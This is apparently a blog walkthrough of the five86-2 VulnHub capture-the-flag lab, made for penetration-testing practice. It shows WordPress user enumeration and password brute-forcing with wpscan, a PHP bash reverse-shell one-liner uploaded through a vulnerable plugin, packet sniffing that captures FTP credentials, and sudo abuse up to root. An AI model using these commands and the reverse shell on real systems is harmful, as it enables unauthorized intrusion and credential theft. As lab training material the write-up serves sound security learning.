five86 2 walkthrough vulnhub ctf

five86:-2 Walkthrough Vulnhub CTF Writeup

Five86:-2 Download Link

Today we are solving five86: 2 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 2 walkthrough

Every Time our first Step is Finding our target IP address using any toll Today we are using netdiscover

five86 2 walkthrough

Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http WordPress service is running

nmap -A
five86 2 walkthrough


enumerating port 80 http service we already see Nmap scan target machine running WordPress

we go to wp-login page and we can see the error WordPress URL fixing the error I am adding a hostname our hostname file five86-2 this hostname we are already seeing in URL error

vi /etc/hosts five86-2

five86 2 walkthrough

After adding the target machine hostname our hostname file I run the most popular tool wpscan for WordPress and ( -e u parameter use all WordPress user enumerate )

wpscan --url http://five86-2 -e u
five86 2 walkthrough

After completing our scan we see wpscan output 5 User entry see the image file

  1. admin
  2. gillian
  3. peter
  4. barney
  5. stephen

I already create a user.txt file and add every user we found in wpscan

our next step is password Bruteforce attack against 5 users ( -U parameter our user list file directory) and ( -P parameter use password wordlists file )

wpscan --url http://five86-2 -U user.txt -P /usr/share/wordlists/rockyou.txt
five86 2 walkthrough

After completing the password Brute-Force attack we found two usernames and passwords.

  • Username: barney
  • Password: spooky1
  • username: stephen
  • password: apollo1

After login the WordPress I go to Plugins Section and we see three plugins After searching all plugin version exploit-db I found a Vulnerable Plugin Insert or Embed Articulate Content into WordPress – Remote Code Execution.

I creating a Simple php oneliner reverse shell and save a file shell.php and I create one another file index.html and compressed a zip file name

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");
five86 2 walkthrough

I click the post button and we see WordPress hello word! default post I am got to edit section and click the plus button and insert an E-Learning Blog

and Uploading our file and we see the directory e-Learning Block Now before opening our file starting our natcat listener

Now before opening our file starting our Netcat listener and open the shell.php directory

five86 2 walkthrough

We got a target system Netcat reverse connection

nc -lvp 1234
cd /home

Privileges Escalation

and I go to target home directory and see all username and I found a user Stephen we already found the user password wpscan Now changing the shell www-data to Stephen shell

  • su stephen
  • Password: apollo1

After changing the user we see blank shell now importing python3 to proper shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Id command to see userID and group ID and others ID


IP add to see all interface name our target machine

ip add

changing our directory to user Stephen directory and I dump all TCP packet target machine and save a hacknos.pcap file

cd stephen
timeout 120 tcpdump -w hacknos.pcap -i veth2c37c59

After complete TCP dump process, I open the file and I see FTP username and password

tcpdump -r hacknos.pcap |more

Changing our using FTP username paul and password esomepasswford

  • su paul
  • Password: esomepasswford

sudo -l command to see all user entry sudoers file And I see user peter is run the tool /usr/sbin/service without asking root password

sudo -l

I search in google and I found a privilege escalation /service and I run the command and our shell is change paul to peter

sudo -u peter /usr/sbin/service ../../bin/bash
sudo -l

again sudo -l to see sudoers user entry and we see user peter is run passwd command without asking root password I change the root password and switching normal user to root user shell.

sudo -u root passwd root
  • New password: toor
  • Retype new password: toor
  • su root
  • Password: toor
cd /root
five86 2 walkthrough

target root directory we see our root flag

cat thisistheflag.txt
five86 2 walkthrough

Five86-1 Vulnhub CTF Walkthrough see here

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →